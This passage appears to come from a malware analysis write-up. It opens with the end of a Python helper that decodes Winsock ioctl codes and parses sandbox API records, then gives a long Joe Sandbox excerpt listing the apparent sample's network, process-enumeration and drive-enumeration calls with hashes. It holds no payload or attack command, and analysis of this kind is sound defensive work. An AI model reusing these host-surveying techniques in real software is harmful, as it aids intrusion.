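    winsock_ioctl(IOC_OUT, "s", 7): "SIOCATMARK",   # 0x40047307
}


def decode_ioctl(code: int) -> str:
    return KNOWN_IOCTLS.get(code, f"unknown(0x{code:08X})")


def drives_from_mask(mask: int) -> list:
    """Bit n of GetLogicalDrives() set => drive chr('A'+n) exists.

    Walking the bits while advancing a letter is what turns a single
    "A:\\" literal into "C:\\", "D:\\", ... at run time."""
    return [f"{chr(ord('A') + n)}:\\" for n in range(26) if (mask >> n) & 1]


# One API record as the report prints it, e.g.
#   ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0039ABE3
RECORD_RE = re.compile(
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def parse_api_record(line: str) -> dict:
    """Split one record into api/module/args/ref and annotate what we can.

    '?' marks an argument the sandbox could not recover; it is left alone."""
    m = RECORD_RE.search(line)
    if m is None:
        raise ValueError(f"not an API record: {line!r}")
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    rec = {"api": m["api"], "module": m["module"], "args": args,
           "ref": int(m["ref"], 16), "note": ""}
    if rec["api"] == "ioctlsocket" and len(args) >= 3 and args[1] != "?":
        name = decode_ioctl(int(args[1], 16))
        if name == "FIONBIO" and args[2] != "?":
            name += " (non-blocking " + ("on" if int(args[2], 16) else "off") + ")"
        rec["note"] = name
    elif rec["api"] == "GetLogicalDrives":
        rec["note"] = "returns drive bitmask; see drives_from_mask()"
    return rec


# Copied from the function listing above.
SAMPLE_RECORDS = [
    "socket.WS2_32(FFFFFFFF,?,00000000), ref: 0039AB9B",
    "ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0039ABE3",
    "GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8",
]
DEMO_MASK = 0x0000000C  # constructed: a machine with only C: and D:


def summarize(records=SAMPLE_RECORDS) -> list:
    """Return one human-readable line per record."""
    out = []
    for line in records:
        r = parse_api_record(line)
        out.append(f"{r['ref']:08X} {r['module']}!{r['api']}"
                   f"({', '.join(r['args'])}) {r['note']}".rstrip())
    return out


if __name__ == "__main__":
    for line in summarize():
        print(line)
    print("drives for mask 0x%08X:" % DEMO_MASK, drives_from_mask(DEMO_MASK))
```

The ioctl table is built from the macro rather than typed in as literals so that an unfamiliar code can be checked the same way: split off the direction bit, the size field, the group character and the command number, and compare against the header.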
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: CloseEvent
                                    • String ID: multi.c
                                    • API String ID: 2624557715-214371023
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: FD %s:%d sclose(%d)
                                    • API String ID: 2781271927-3116021458
                                    APIs
                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0039B29E,?,00000000,?,?), ref: 0039B0BA
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00383C41,00000000), ref: 0039B0C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnect
                                    • String ID:
                                    • API String ID: 374722065-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(-00000043,-00000043,0D53F9D2,?), ref: 070F0419
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608275887.00000000070F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070F0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70f0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 998ebb1c74cbc9485a43d7473a1498c129eecefc6dc0e7d9be2d23748f65f8dd
                                    • Instruction ID: 582be8d7588f796696f329c4407e888b3abe71b21fe4d9a95340784218c75c3f
                                    • Opcode Fuzzy Hash: 998ebb1c74cbc9485a43d7473a1498c129eecefc6dc0e7d9be2d23748f65f8dd
                                    • Instruction Fuzzy Hash: 5CB1ADFB26C121BDB142C5852F64AFFA76DE2D7730B308627F627D6D03E2944A4A1531
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: a78eaf0eb64be64c23e6fe619e98790a4f94c7889dba0d54eb6fd6d06c9f567d
                                    • Instruction ID: 82761eb23b5521ec12e3dd6914b4187aca179e397672de92b21023f7745566d3
                                    • Opcode Fuzzy Hash: a78eaf0eb64be64c23e6fe619e98790a4f94c7889dba0d54eb6fd6d06c9f567d
                                    • Instruction Fuzzy Hash: 5B4191FB16C120BD714B90416B14BFA672EE6DF730B328426F807D96C1E7E44B8950B2
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 9b947e9ee563f9133f4320d94f51055a30ea48eea922dfc71002286870ada3a9
                                    • Instruction ID: 80f280107cb7b54f91338170fe46acc53287a01ec6236b422e70765385edcea7
                                    • Opcode Fuzzy Hash: 9b947e9ee563f9133f4320d94f51055a30ea48eea922dfc71002286870ada3a9
                                    • Instruction Fuzzy Hash: 574191FB16C220BD714B84416B14BFA6A2EE6DF730B328426F407D96C1E3E44B8950F2
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: d998935baac9f1329447e8b5ebae3c1dca3121848674bb90bbdb18c6b015a9ce
                                    • Instruction ID: 43dea1ad0610ecfd2756a27b7c41edcaab953efdc27f807c0052ea57750225e8
                                    • Opcode Fuzzy Hash: d998935baac9f1329447e8b5ebae3c1dca3121848674bb90bbdb18c6b015a9ce
                                    • Instruction Fuzzy Hash: 5041B2EB56C229BDB242C2D52B549FF6B6EE5D3330F30863AF417C1502F2954E4A6032
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 5a9feb2ac0b61bf1554bc84a2d326539afffecb542933a48bb0b79c61f302597
                                    • Instruction ID: bc5ce03d020ccb0d1d1025af54ae8cd82636cb743f04c826fd859aa525d0d309
                                    • Opcode Fuzzy Hash: 5a9feb2ac0b61bf1554bc84a2d326539afffecb542933a48bb0b79c61f302597
                                    • Instruction Fuzzy Hash: 2F31D6FB02C120BE614B41416B19BFB6B2EE6DF330B328466F407D96C1E3D40B8950B2
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: 0461dee15ac5bf012d1b56bacca72a9f30598deb60c4bc723f5681945045b342
                                    • Instruction ID: 8ba9ddda5e8ea312507946cb0c6a76e20399a2bc7dbbe4ead25c8036e213340c
                                    • Opcode Fuzzy Hash: 0461dee15ac5bf012d1b56bacca72a9f30598deb60c4bc723f5681945045b342
                                    • Instruction Fuzzy Hash: 24317CEB26D228BD7242C2C52B54AFF6B6EE5D7734F30862AF427D1502F6944E4A5031
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6a29352f8abb66baa4c7b95dacd98c3cc58f3e80db0a8eb7fdba0dc3c8d83117
                                    • Instruction ID: 42b23ffc31267c8d9ee3c359929b482d1be0d1f4186f2e6163676585a31f9e8c
                                    • Opcode Fuzzy Hash: 6a29352f8abb66baa4c7b95dacd98c3cc58f3e80db0a8eb7fdba0dc3c8d83117
                                    • Instruction Fuzzy Hash: 2031C3FB02C120BEA14B51516B19BFA6B1EE6DF730B324566F407D96C1E3D80B8950F6
                                    APIs
                                    • gethostname.WS2_32(00000000,00000040), ref: 00384AA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606506723.0000000000F76000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606522019.0000000000F77000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606538018.0000000000F78000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_2d0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: gethostname
                                    • String ID:
                                    • API String ID: 144339138-0
                                    • Opcode ID: af1b516954e691c970b3902f4a07d54f49a921594975aa32d26acff4161748af
                                    • Instruction ID: 268683b953aa3a47b779ac1f215209c8f0fd0bdd269d5c9c6a36b51cf772545c
                                    • Opcode Fuzzy Hash: af1b516954e691c970b3902f4a07d54f49a921594975aa32d26acff4161748af
                                    • Instruction Fuzzy Hash: 2251F3706043028BEB33AF65DD4972376D8AF41315F1508BCE98A8BED1E7B8E844C742
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: dcdb4a8a2b0790418e0850b8826f29825f467319289d54114d0454b0ed7715ab
                                    • Instruction ID: 944f2f0ed60e3d9c0f585b7499308b2b08f303ba51843af22a2ddf1e760eb432
                                    • Opcode Fuzzy Hash: dcdb4a8a2b0790418e0850b8826f29825f467319289d54114d0454b0ed7715ab
                                    • Instruction Fuzzy Hash: 9031B0E722D229BDB242C1D56B549FF2B6EE5D3334F30862BF427C5602F2844E4A5031
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,?,?,0000DD49), ref: 070A0CB8
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608192977.00000000070A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_70a0000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID:
                                    • API String ID: 999431828-0
                                    • Opcode ID: cf6885e8d5fc120fbb335265a1a2fa7750059874ffa889097ce0bab36bc8d9b3
                                    • Instruction ID: f1e7af845a0b3d184b40940d0d0e23997a6649562c2efb1fd0f6b99ad3f266bf
                                    • Opcode Fuzzy Hash: cf6885e8d5fc120fbb335265a1a2fa7750059874ffa889097ce0bab36bc8d9b3
                                    • Instruction Fuzzy Hash: 5B219EEB26D229BD7142C1C52B54AFF1B6EE5E7734F30862BF427D5601F2845E4A5032
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e7f8fbc0fd9b0dccf0346ed2d441441137c10ad582bb4476f3dba18a6d5d66e9
                                    • Instruction ID: 11a011fdb7ab145cd9ed9056499609956f18cb2f6599acf13785c58875942e99
                                    • Opcode Fuzzy Hash: e7f8fbc0fd9b0dccf0346ed2d441441137c10ad582bb4476f3dba18a6d5d66e9
                                    • Instruction Fuzzy Hash: CD21D6FB05D1607E611741816F54BF76A1EE5CB330B328566F807DAAC2D3D80B4910F6
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: c469d5017edf9dcf61e65c54455683cb2070a4639799ca366f945ce38f16ae5d
                                    • Instruction ID: b6de14f989bb9e4189f6cc4069f572077391539f6cd2df2ea1e579cacc1e0749
                                    • Opcode Fuzzy Hash: c469d5017edf9dcf61e65c54455683cb2070a4639799ca366f945ce38f16ae5d
                                    • Instruction Fuzzy Hash: 77016DFB15D060BD705A91812F55FFB666EE1CB730732852BF803D99C2E3C80A4A10BA
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 890b8f67fab628b5fa3da1037fac96de04878638abe2fcbf693c9665d51f1937
                                    • Instruction ID: b4aa55584bd4b8f0109c13f3c00d5daa48cd14c5b5f938c9b96d84c98ddc866d
                                    • Opcode Fuzzy Hash: 890b8f67fab628b5fa3da1037fac96de04878638abe2fcbf693c9665d51f1937
                                    • Instruction Fuzzy Hash: 32017CFB11D0607C705281912F54EFBAB6DE5C7630332C86AF802D9986D3C80F8E51BA
                                    APIs
                                    • Process32NextW.KERNEL32(?,?,07100073,?), ref: 071004B3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1608289437.0000000007100000.00000040.00001000.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7100000_r8nllkNEQX.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: d7268303393ac65b5d47e4b1afabb86c2b710e275b9fa3b2ed35d78fec8843e6
                                    • Instruction ID: b1d768a034f5bcb23a802537bc286e827bb0cd55154fa9c339d6239457250db4
                                    • Opcode Fuzzy Hash: d7268303393ac65b5d47e4b1afabb86c2b710e275b9fa3b2ed35d78fec8843e6
                                    • Instruction Fuzzy Hash: 950146FF14D0607D704291423E19EFBAB6DD4C7730331886BF802D5986E3C80A4A60B6
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0039AFD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1605482924.00000000002D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002D0000, based on PE: true
                                     • Associated: 00000000.00000002.1605461188.00000000002D0000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.00000000008B0000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A16000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605482924.0000000000A18000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1605995928.0000000000A1B000.00000004.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000A1D000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000BA9000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBB000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000CBF000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000D9F000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DA6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606013423.0000000000DB6000.00000040.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606362172.0000000000DB7000.00000080.00000001.01000000.00000003.sdmp
                                     • Associated: 00000000.00000002.1606489988.0000000000F75000.00000040.00000001.01000000.00000003.sdmp
